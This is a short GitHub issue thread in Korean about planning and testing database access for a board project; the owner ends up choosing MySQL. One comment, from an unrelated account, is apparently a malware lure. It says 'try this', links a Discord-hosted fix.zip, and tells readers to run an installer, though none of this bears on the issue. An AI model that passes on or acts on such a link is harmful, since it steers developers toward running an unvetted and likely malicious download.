### ISSUE TITLE
데이터베이스 접근 로직 테스트 정의

### ISSUE THREAD

**Issue by testerhwan** [testerhwan/fastcampus-project-board#10]
도메인 설계 내용(#8)을 바탕으로 DB 와 연동하기 위한 방법을 구상하고, 세팅을 하고, 테스트를 먼저 작성해본다.

- [x] DB 기술 선택하기
- [x] DB 에 접근할 수 있는 상태로 환경 세팅하기
- [x] 테스트

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by testerhwan** [comment]
MySQL 을 선택하기로 함
